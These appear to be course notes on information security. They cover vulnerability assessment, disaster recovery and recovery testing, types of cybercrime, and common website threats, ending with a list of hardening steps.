• Vulnerability Scanning: This is done through automated software to scan a system
against known vulnerability signatures.
• Security Scanning: It involves identifying network and system weaknesses, and later
provides solutions for reducing these risks. This scanning can be performed for both
Manual and Automated scanning.
• Penetration testing: This kind of testing simulates an attack from a malicious hacker.
This testing involves analysis of a particular system to check for potential vulnerabilities
to an external hacking attempt.
• Risk Assessment: This testing involves analysis of security risks observed in the
organization. Risks are classified as Low, Medium and High. This testing recommends
controls and measures to reduce the risk.
• Security Auditing: This is an internal inspection of Applications and Operating systems
for security flaws. An audit can also be done via line by line inspection of code
• Ethical hacking: It's hacking an Organization Software systems. Unlike malicious
hackers, who steal for their own gains, the intent is to expose security flaws in the
system.
• Posture Assessment: This combines Security scanning, Ethical Hacking and Risk
Assessments to show an overall security posture of an organization.
Vulnerability
Vulnerability is any mistakes or weakness in the system security procedures, design,
implementation or any internal control that may result in the violation of the system's security
policy.
A flaw or weakness in a system's design, implementation, or operation and management that
could be exploited to violate the system's security policy
Vulnerability—Weakness in an information system, system security procedures, internal
controls, or implementation that could be exploited by a threat source
Vulnerabilities are related to:
• physical environment of the system • hardware
• the personnel • software
• management • communication equipment and facilities
• administration procedures and security • peripheral devices
measures within the organization • their combinations.
• business operation and service delivery

It is evident that a pure technical approach cannot even protect physical assets: one should have
administrative procedure to let maintenance personnel to enter the facilities and people with
adequate knowledge of the procedures, motivated to follow it with proper care.
Four examples of vulnerability exploits:
• an attacker finds and uses an overflow weakness to install malware to export sensitive data;
• an attacker convinces a user to open an email message with attached malware;
• an insider copies a hardened, encrypted program onto a thumb drive and cracks it at home;
• a flood damages one's computer systems installed at ground floor.
Classification of Vulnerabilities
Vulnerabilities are classified according to the asset class they are related to:

• hardware o insecure network architecture

o susceptibility to humidity • personnel
o susceptibility to dust o inadequate recruiting process
o susceptibility to soiling o inadequate security awareness
o susceptibility to unprotected storage • physical site
• software o area subject to flood
o insufficient testing o unreliable power source
o lack of audit trail • organizational
o design flaw o lack of regular audits
• network o lack of continuity plans
o unprotected communication lines o lack of security
Causes of Vulnerability
• Complexity: Large, complex systems increase the probability of flaws and
unintended access points.
• Familiarity: Using common, well-known code, software, operating systems, and/or
hardware increases the probability an attacker has or can find the knowledge and tools to
exploit the flaw
• Connectivity: More physical connections, privileges, ports, protocols, and services and time
each of those are accessible increase vulnerability.
• Password management flaws: The computer user uses weak passwords that could be
discovered by brute force.[19] The computer user stores the password on the computer where
a program can access it. Users re-use passwords between many programs and websites.
• Fundamental operating system design flaws: The operating system designer chooses to
enforce suboptimal policies on user/program management. For example, operating systems
with policies such as default permit grant every program and every user full access to the
entire computer. This operating system flaw allows viruses and malware to execute
commands on behalf of the administrator.
• Internet Website Browsing: Some internet websites may contain
harmful Spyware or Adware that can be installed automatically on the computer systems.
After visiting those websites, the computer systems become infected and personal
information will be collected and passed on to third party individuals.
• Software bugs: The programmer leaves an exploitable bug in a software program. The
software bug may allow an attacker to misuse an application.
• Unchecked user input: The program assumes that all user input is safe. Programs that do
not check user input can allow unintended direct execution of commands or SQL statements
(known as Buffer overflows, SQL injection or other non-validated inputs).
• Not learning from past mistakes: for example most vulnerabilities discovered
in IPv4 protocol software were discovered in the new IPv6 implementations.
The research has shown that the most vulnerable point in most information systems is the human
user, operator, designer, or other human: so humans should be considered in their different roles
as asset, threat, information resources.
What is Vulnerability Assessment / Testing?
Vulnerability Assessment is a process to evaluate the security risks in the software system in
order to reduce the probability of a threat. It is also called Vulnerability Testing.
The purpose of Vulnerability Assessment is to reduce the possibility for intruders (hackers) to
get unauthorized access.
How to do Vulnerability Testing
Following is the step by step Vulnerability
Assessment Methodology/ Technique
Step 1) Setup:
• Begin Documentation • Update Tools
• Secure Permission • Configure Tools
Step 2) Test Execution:
• Run the Tools
• Run the captured data packet
Step 3) Vulnerability Analysis:
• Defining and classifying network or System resources.
• Assigning priority to the resource( Ex: - High, Medium, Low)
• Identifying potential threats to each resource.
• Developing a strategy to deal with the most prioritize problems first.
• Defining and implementing ways to minimize the consequences if an attack occurs.
Step 4) Reporting
Step 5) Remediation:
• The process of fixing the vulnerabilities.
• For every vulnerability

Advantages of Vulnerability Assessment

• Open Source tools are available. • Automated for Scanning.
• Identifies almost all vulnerabilities • Easy to run on a regular basis.

Disadvantages of Vulnerability Assessment

• High false positive rate
• Can easily detect by Intrusion Detection System Firewall.
• Often fail to notice the latest vulnerabilities.
Vulnerability Testing Methods
Active Testing
• In active Testing, a tester introduces new test data and analyzes the results.
• During the testing process, the testers create a mental model of the process, and it will
grow further during the interaction with the software under test.
• While doing the test, the tester will actively involve in the process of finding out the new
test cases and new ideas. That's why it is called Active Testing.
Passive Testing
• Passive testing, monitoring the result of running software under test without introducing
new test cases or data
Network Testing
• Network Testing is the process of measuring and recording the current state of network
operation over a period of time.
• Testing is mainly done for predicting the network operating under load or to find out the
problems created by new services.
• We need to Test the following Network Characteristics:-
• Utilization levels
• Number of Users
• Application Utilization
Distributed Testing
• Distributed Tests are applied for testing distributed applications, which means, the
applications that are working with multiple clients simultaneously. Basically, testing a
distributed application means testing its client and server parts separately, but by using a
distributed testing method, we can test them all together.
• The test parts will interact with each other during the Test Run. This makes them
synchronized in an appropriate manner. Synchronization is one of the most crucial points
in distributed testing.
Disaster Management
Disaster Management is a strategic planning and procedure that is administered and employed to
protect critical infrastructures (also known as "critical assets") from severe damages when
natural or human made calamities and catastrophic even occur.
Disaster management plans are multi-layered and are aimed to address such issues as floods,
hurricanes, fires, bombings, and even mass failures of utilities or the rapid spread of disease
Though vulnerability to disaster varies, there are four main types of disaster
• Natural disasters. These disasters include floods, hurricanes, earthquakes and volcano
eruptions that can have immediate impacts on human health, as well as secondary
impacts causing further death and suffering from floods causing landslides, earthquakes
resulting in fires, tsunamis causing widespread flooding and typhoons sinking ferries
• Environmental emergencies. These emergencies include technological or industrial
accidents, usually involving hazardous material, and occur where these materials are
produced, used or transported. Large forest fires are generally included in this definition
because they tend to be caused by humans.
• Complex emergencies. These emergencies involve a break-down of authority, looting
and attacks on strategic installations. Complex emergencies include conflict situations
and war.
• Pandemic emergencies. These emergencies involve a sudden onset of a contagious
disease that affects health but also disrupts services and businesses, bringing economic
and social costs.
Emergency Management
Emergency Management is the generic name of an interdisciplinary field dealing with the
strategic organization management processes used to protect asses of an organization from
hazard risks that can cause disasters or catastrophes, and to ensure the continuance of the
organization within their planned lifetime.
Emergency Management is a systematic process leading to action before, during and after a
disaster to save lives and prevent injury.
"Disaster" here means a major emergency that exceeds the community's capacity to respond
successfully with its own resources.
Emergency Management is organized into four phases:
• Mitigation: actions taken to eliminate a hazard or reduce its potential impact.
• Preparedness: planning for major emergencies, including training and exercises.
• Response: actions taken in response to emergencies.
• Recovery: actions taken after a disaster to restore services and reconstruct communities.
Resilience and Prevention
Resilience defines the capability to recover from catastrophe or misfortune. Prevention is totally
avoiding danger or risky events.
Mitigation
Mitigation is the effort to reduce loss of life and property by lessening the impact of disasters.
Preparedness
Preparedness is way of mitigating unwanted outcome and it is one of the crucial actions in
achieving safety and security in the event of calamities, disasters, and terrorism.
Response
An emergency response plan must provide the resources and information needed to evaluate the
human and environmental health impacts of the event, assess and reduce human exposures to
contaminants, and develop science-based strategies for remediation and rebuilding.
Recovery
Recovery efforts are primarily concerned with actions that involve rebuilding destroyed property,
re-employment, and the repair of other essential infrastructure.
Disaster Recovery
Disaster recovery is generally a planning process and it produces a document which ensures
businesses to solve critical events that affect their activities. Such events can be a natural
disaster (earthquakes, flood, etc.), cyber–attack or hardware failure like servers or routers.
As such having a document in place it will reduce the down time of business process from the
technology and infrastructure side. This document is generally combined with Business
Continuity Plan which makes the analyses of all the processes and prioritizes them according to
the importance of the businesses. In case of a massive disruption it shows which process should
be recovered firstly and what should be the downtime. It also minimizes the application service
interruption. It helps us to recover data in the organized process and help the staff to have a
clear view about what should be done in case of a disaster.
Requirements to Have a Disaster Recovery Plan
Disaster recovery starts with an inventory of all assets like computers, network equipment,
server, etc. and it is recommended to register by serial numbers too. We should make an
inventory of all the software and prioritize them according to business importance.
An example is shown in the following table −

Systems Down Time Disaster type Preventions Solution strategy Recover fully

Payroll Server We take Restore the backups in Fix the primary server and
8 hours
system damaged backup daily the Backup Server restore up to date data

You should prepare a list of all contacts of your partners and service providers, like ISP contact
and data, license that you have purchased and where they are purchased. Documenting all your
Network which should include IP schemas, usernames and password of servers.
Preventive steps to be taken for Disaster Recovery
• The server room should have an authorized level. For example: only IT personnel should
enter at any given point of time.
• In the server room there should be a fire alarm, humidity sensor, flood sensor and a
temperature sensor.
• At the server level, RAID systems should always be used and there should always be a spare
Hard Disk in the server room.
• You should have backups in place, this is generally recommended for local and off-site
backup, so a NAS should be in your server room.
• Backup should be done periodically.
• The connectivity to internet is another issue and it is recommended that the headquarters
should have one or more internet lines. One primary and one secondary with a device that
offers redundancy.
• If you are an enterprise, you should have a disaster recovery site which generally is located
out of the city of the main site. The main purpose is to be as a stand-by as in any case of a
disaster, it replicates and backs up the data.
What is Recovery Testing?
Recovery testing verifies the system's ability to recover from points of failure like
software/hardware crashes, network failures etc. The purpose of Recovery Testing is to
determine whether operations can be continued after a disaster or after the integrity of the system
has been lost. It involves reverting to a point where the integrity of the system was known and
then reprocessing transactions up to the point of failure.
Recovery Testing Example
When an application is receiving data from the network, unplug the connecting cable.
• After some time, plug the cable back in and analyze the application’s ability to continue
receiving data from the point at which the network connection was broken.
 • Restart the system while a browser has a definite number of sessions open and check
whether the browser is able to recover all of them or not
In Software Engineering, Recoverability Testing is a type of Non- Functional Testing. (Non-
functional testing refers to aspects of the software that may not be related to a specific function
or user action such as scalability or security.)
The time taken to recover depends upon:
• The number of restart points
• A volume of the applications
• Training and skills of people conducting recovery activities and tools available for
recovery.
When there are a number of failures then instead of taking care of all failures, the recovery
testing should be done in a structured fashion which means recovery testing should be carried out
for one segment and then another.
It is done by professional testers. Before recovery testing, adequate backup data is kept in secure
locations. This is done to ensure that the operation can be continued even after a disaster.
Life Cycle of Recovery Process
The life cycle of the recovery process can be classified into the following five steps:

1. Normal operation
2. Disaster occurrence
3. Disruption and failure of the
operation
4. Disaster clearance through the
recovery process
5. Reconstruction of all processes and
information to bring the whole
system to move to normal operation

Let’s discuss these 5 steps in detail-

1. A system consisting of hardware, software, and firmware integrated to achieve a common
goal is made operational for carrying out a well-defined and stated goal. The system is
called to perform the normal operation to carry out the designed job without any
disruption within a stipulated period of time.
2. A disruption may occur due to malfunction of the software, due to various reasons like
input initiated malfunction, software crashing due to hardware failure, damaged due to
fire, theft, and strike.
3. Disruption phase is a most painful phase which leads to business losses, relation break,
opportunity losses, man-hour losses and invariably financial and goodwill losses. Every
sensible agency should have a plan for disaster recovery to enable the disruption phase to
be minimal.
 4. If a backup plan and risk mitigation processes are at the right place before encountering
disaster and disruption, then recovery can be done without much loss of time, effort and
energy. A designated individual, along with his team with the assigned role of each of
these persons should be defined to fix the responsibility and help the organization to save
from long disruption period.
5. Reconstruction may involve multiple sessions of operation to rebuild all folders along
with configuration files. There should be proper documentation and process of
reconstruction for correct recovery.
Restoration Strategy
The recovery team should have their unique strategy for retrieving the important code and data to
bring the operation of the agency back to normalcy.
The strategy can be unique to each organization based on the criticality of the systems they are
handling.
The possible strategy for critical systems can be visualized as follows:
1. To have a single backup or more than one
2. To have multiple back-ups at one place or different places
3. To have an online backup or offline backup
4. Can the backup is done automatically based on a policy or to have it manually?
5. To have an independent restoration team or development team itself can be utilized for
the work
Each of these strategies has cost factor associated with it and multiple resources required for
multiple back-ups may consume more physical resources or may need an independent team.
Many companies may be affected due to their data and code dependency on the concerned
developer agency. For instance, if Amazon AWS goes down its shuts 25 of the internet.
Independent Restoration is crucial in such cases.
How to do Recovery Testing
While performing recovery testing following things should be considered.
• We must create a test bed as close to actual conditions of deployment as possible.
Changes in interfacing, protocol, firmware, hardware, and software should be as close to
the actual condition as possible if not the same condition.
• Through exhaustive testing may be time-consuming and a costly affair, identical
configuration, and complete check should be performed.
• If possible, testing should be performed on the hardware we are finally going to restore.
This is especially true if we are restoring to a different machine than the one that created
the backup.
• Some backup systems expect the hard drive to be exactly the same size as the one the
backup was taken from.
 • Obsolescence should be managed as drive technology is advancing at a fast pace, and old
drive may not be compatible with the new one. One way to handle the problem is to
restore to a virtual machine. Virtualization software vendors like VMware Inc. can
configure virtual machines to mimic existing hardware, including disk sizes and other
configurations.
• Online backup systems are not an exception for testing. Most online backup service
providers protect us from being directly exposed to media problems by the way they use
fault-tolerant storage systems.
• While online backup systems are extremely reliable, we must test the restore side of the
system to make sure there are no problems with the retrieval functionality, security or
encryption.
Testing procedure after restoration
Most large corporations have independent auditors to perform recovery test exercises
periodically.
The expense of maintaining and testing a comprehensive disaster recovery plan can be
substantial, and it may be prohibitive for smaller businesses.
Smaller risks may rely on their data backups and off-site storage plans to save them in the case of
a catastrophe.
After folders and files are restored, following checks can be done to assure that files are
recovered properly:
• Rename the corrupted document folder
• Count the files in the restored folders and match with it with an existing folder.
• Open a few of the files and make sure they are accessible. Be sure to open them with the
application that normally uses them. And make sure you can browse the data, update the
data or whatever you normally do.
• It is best to open several files of different types, pictures, mp3s, documents and some
large and some small.
• Most operating systems have utilities that you can use to compare files and directories.
Computer Crimes
Computer crime / Cybercrime is defined as an unlawful action against any person using a
computer, its systems, and its online or offline applications. It occurs when information
technology is used to commit or cover an offense. However, the act is only considered
Cybercrime if it is intentional and not accidental.
The crime that involves and uses computer devices and Internet, is known as Computer or
Cybercrime.
What is Cybercrime?
Cyber-crime is the use of computers and networks to perform illegal activities such as spreading
computer viruses, online bullying, performing unauthorized electronic fund transfers, etc. Most
cybercrimes are committed through the internet. Some cybercrimes can also be carried out
using Mobile phones via SMS and online chatting applications.
Examples of Cybercrime
The following list presents the common types of cybercrimes:
• Computer Fraud: Intentional deception for personal gain via the use of computer systems.
• Privacy violation: Exposing personal information such as email addresses, phone number,
account details, etc. on social media, websites, etc.
• Identity Theft: Stealing personal information from somebody and impersonating that person.
• Sharing copyrighted files/information: This involves distributing copyright protected files
such as eBooks and computer programs etc.
• Electronic funds transfer: This involves gaining an un-authorized access to bank computer
networks and making illegal fund transfers.
• Electronic money laundering: This involves the use of the computer to launder money.
• ATM Fraud: This involves intercepting ATM card details such as account number and PIN
numbers. These details are then used to withdraw funds from the intercepted accounts.
• Denial of Service Attacks: This involves the use of computers in multiple locations to attack
servers with a view of shutting them down.
• Spam: Sending unauthorized emails. These emails usually contain advertisements.
Types of Cybercrime
Let us now discuss the major types of cybercrime −
1) Hacking
It is an illegal practice by which a hacker breaches the computer’s security system of someone
for personal interest.
 2) Unwarranted mass-surveillance
Mass surveillance means surveillance of a substantial fraction of a group of people by the
authority especially for the security purpose, but if someone does it for personal interest, it is
considered as cybercrime.
3) Child pornography
It is one of the most heinous crimes that is brazenly practiced across the world. Children are
sexually abused and videos are being made and uploaded on the Internet.
4) Child grooming
It is the practice of establishing an emotional connection with a child especially for the purpose
of child-trafficking and child prostitution.
5) Copyright infringement
If someone infringes someone’s protected copyright without permission and publishes that with
his own name, is known as copyright infringement.
6) Identity theft
Identity theft occurs when a cyber-criminal impersonates someone else identity to practice
malfunction.
7) Denial of Service Attack:
In this cyberattack, the cyber-criminal uses the bandwidth of the victim's network or fills their e-
mail box with spammy mail. Here, the intention is to disrupt their regular services.
8) Software Piracy:
Theft of software by illegally copying genuine programs or counterfeiting. It also includes the
distribution of products intended to pass for the original.
9) Phishing:
Phishing is a technique of extracting confidential information from the bank/financial
institutional account holders by illegal ways.
10) Spoofing:
It is an act of getting one computer system or a network to pretend to have the identity of
another computer. It is mostly used to get access to exclusive privileges enjoyed by that
network or computer.
11) Click fraud
Advertising companies such as Google AdSense offer pay per click advertising services. Click
fraud occurs when a person clicks such a link with no intention of knowing more about the click
but to make more money. This can also be accomplished by using automated software that
makes the clicks.
12) Advance Fee Fraud
An email is sent to the target victim that promises them a lot of money in favor of helping them
to claim their inheritance money.
 13) Cyber-extortion
When a hacker hacks someone’s email server, or computer system and demands money to
reinstate the system, it is known as cyber-extortion.
14) Cyber-terrorism
Normally, when someone hacks government’s security system or intimidates government or
such a big organization to advance his political or social objectives by invading the security
system through computer networks, it is known as cyber-terrorism.
15) Computer virus
Viruses are unauthorized programs that can annoy users, steal sensitive data or be used to control
equipment that is controlled by computers.

Securing the Web

There are many ways to assure yourself, employees, and customers that your website is safe.
Website security does not have to be a guessing game. Take essential steps towards improving
your site’s security. Help keep data away from prying eyes.
No method can guarantee your site will forever be “hacker-free.” The use of preventative
methods will reduce your site’s vulnerability. Website security is both a simple and complicated
process.
Website Vulnerabilities & Threats
The most common website security vulnerabilities and threats are:
1. SQL Injections
SQL injection attacks are done by injecting malicious code in a vulnerable SQL query. They rely
on an attacker adding a specially crafted request within the message sent by the website to the
database. A successful attack will alter the database query in such a way that it will return the
information desired by the attacker, instead of the information the website expected.
2. Cross-site Scripting (XSS)
Cross-site scripting attacks consist of injecting malicious client-side scripts into a website and
using the website as a propagation method.
The danger behind XSS is that it allows an attacker to inject content into a website and modify
how it is displayed, forcing a victim’s browser to execute the code provided by the attacker when
loading the page. If a logged in site administrator loads the code, the script will be executed with
their level of privilege, which could potentially lead to site takeover.
3. Credential Brute Force Attacks
Gaining access to a website’s admin area, control panel or even to the SFTP server is one of the
most common vectors used to compromise websites. The process is very simple; the attackers
basically program a script to try multiple combinations of usernames and passwords until it finds
one that works.
 4. Website Malware Infections & Attacks
Using some of the previous security issues as a means to gain unauthorized access to a website,
attackers can then:
• Inject SEO spam on the page
• Drop a backdoor to maintain access
• Collect visitor information or credit card data
• Run exploits on the server to escalate access level
• Use visitors’ computers to mine crypto currencies
• Store botnets command & control scripts
• Show unwanted ads, redirect visitors to scam sites
• Host malicious downloads
• Launch attacks against other sites

5. DoS/DDoS Attacks
A Distributed Denial of Service (DDoS) attack is a non-intrusive internet attack. It is made to
take down the targeted website or slow it down by flooding the network, server or application
with fake traffic.
DDoS attacks are threats that website owners must familiarize themselves with as they are a
critical piece of the security landscape. When a DDoS attack targets a vulnerable resource-
intensive endpoint, even a tiny amount of traffic is enough for the attack to be successful.

Website Security Framework

The US National Institute of Standards and Technology (NIST) developed The Cyber security
Framework which forms the basis of our website security principles framework.
Knowing security is a continuous process means it starting with the foundation of a website
security framework. This framework will involve creating a “culture of security” where
scheduled audits will help in keeping things simple and timely.
The five functions: Identify, Protect, Detect, Respond and Recover will be broken out in more
detail along with actions to be applied.
There are at least ten essential steps you can take to improve website safety.
How to Improve Your Websites Safety
1. Keep Software And Plugins Up-To-Date
Every day, there are countless websites compromised due to outdated software. Potential hackers
and bots are scanning sites to attack. Updates are vital to the health and security of your website.
If your site’s software or applications are not up-to-date, your site is not secure.
Take all software and plugin update requests seriously.
Updates often contain security enhancements and vulnerability repairs. Check your website for
updates or add an update notification plugin. Some platforms allow automatic updates, which is
another option to ensure website security.
2. Add HTTPS and an SSL Certificate
To keep your website safe, you need a secure URL. If your site visitors offer to send their private
information, you need HTTPS, not HTTP, to deliver it.
What is HTTPs?
HTTPS (Hypertext Transfer Protocol Secure) is a protocol used to provide security over the
Internet. HTTPS prevents interceptions and interruptions from occurring while the content is in
transit.
For you to create a secure online connection, your website also needs an SSL Certificate. If your
website asks visitors to register, sign-up, or make a transaction of any kind, you need to encrypt
your connection.
What is SSL?
SSL (Secure Sockets Layer) is another necessary site protocol. This transfers visitor’s personal
information between the website and your database. SSL encrypts information to prevent it from
others reading it while in transit.
It denies those without proper authority the ability to access the data, as well.
3. Choose a Smart Password
With there being so many websites, databases, and programs needing passwords, it is hard to
keep track. A lot of people end up using the same password in all places, to remember their login
information. But this is a significant security mistake.
Create a unique password for every new log in request. Come up with complicated, random, and
difficult to guess passwords. Then, store them outside the website directory.
Refrain from using any personal information inside your password as well. Do not use your
birthday or pet’s name; make it completely unguessable. After three months or sooner, change
password to another one, then repeat. Smart passwords are long and should be at least twelve
characters. Password needs to be a combination of numbers and symbols. Make sure to alternate
between uppercase and lowercase letters. Never use the same password twice or share it with
others.
If you are a business owner or CMS manager, ensure all employees change their passwords
frequently.
4. Use a Secure Web Host
Think of your website’s domain name as a street address. Now, think of the web host as the plot
of “real estate” where your website exists online.
As you would research a plot of land to build a house, you need to examine potential web hosts
to find the right one for you. Many hosts provide server security features that better protect your
uploaded website data. There are certain items to check for when choosing a host.
▪ Does the web host offer a Secure File Transfer Protocol (SFTP)?
▪ Is FTP Use by Unknown User disabled?
▪ Does it use a Rootkit Scanner?
▪ Does it offer file backup services?
▪ How well do they keep up to date on security upgrades?
Whether you choose SiteGround or WP Engine as your web host, make sure it has what you
need to keep your site secure.
5. Record User Access and Administrative Privileges
Initially, you may feel comfortable giving several high-level employees access to your website.
If they make a mistake or overlook an issue, this can result in a significant security issue. It is
vital to vet your employees before giving them website access. Find out if they have experience
using your CMS and if they know what to look for to avoid a security breach. Educate every
CMS user about the importance of passwords and software updates. Tell them all the ways they
can help maintain the website’s safety.
To keep track of who has access to your CMS and their administrative settings, make a record
and update it often. Employees come and go. One of the best ways to prevent security issues is
to have a physical record of who does what with your website.
 6. Change Your CMS Default Settings
The most common attacks against websites are entirely automated. What many attack bots rely
on is for users to have their CMS settings on default. After choosing your CMS, change your
default settings immediately. Changes help prevent a large number of attacks from occurring.
CMS settings can include adjusting control comments, user visibility, and permissions.
Customize users and their permission settings. Do not keep the default settings as is, or you will
run into website security issues at some point.
7. Backup Your Website
One of the best methods to keep your site safe is to have a good backup solution. You should
have more than one. Each is crucial to recovering your website after a major security incident
occurs.
There are several different solutions you can use to help recover damaged or lost files.
Keep your website information off-site. Do not store your backups on the same server as your
website; they are as vulnerable to attacks too.
Choose to keep your website backup on a home computer or hard drive. Find an off-site place to
store your data and to protect it from hardware failures, hacks, and viruses.
Another option is to back up your website in the cloud. It makes storing data easy and allows
access to information from anywhere. Be redundant in your backup process — backup your
backup. By doing this, you can recover files from any point before the hack or virus occurs.
8. Know Your Web Server Configuration Files
Get to know your web server configuration files. You can find them in the root web directory.
Web server configuration files permit you to administer server rules. This includes directives to
improve your website security.
9. Apply for a Web Application Firewall
Make sure you apply for a web application firewall (WAF). It sets between your website server
and the data connection. The purpose is to read every bit of data that passes through it to protect
your site.
10. Tighten Network Security
When you think your website is secure, you need to analyze your network security. Employees
who use office computers may inadvertently be creating an unsafe pathway to your website.
To prevent them from giving access to your website’s server, consider doing the following at
your business:
o Have computer logins expire after a short period of inactivity.
o Make sure your system notifies users every three months of password changes.
o Ensure all devices plugged into the network are scanned for malware each time
they are attached.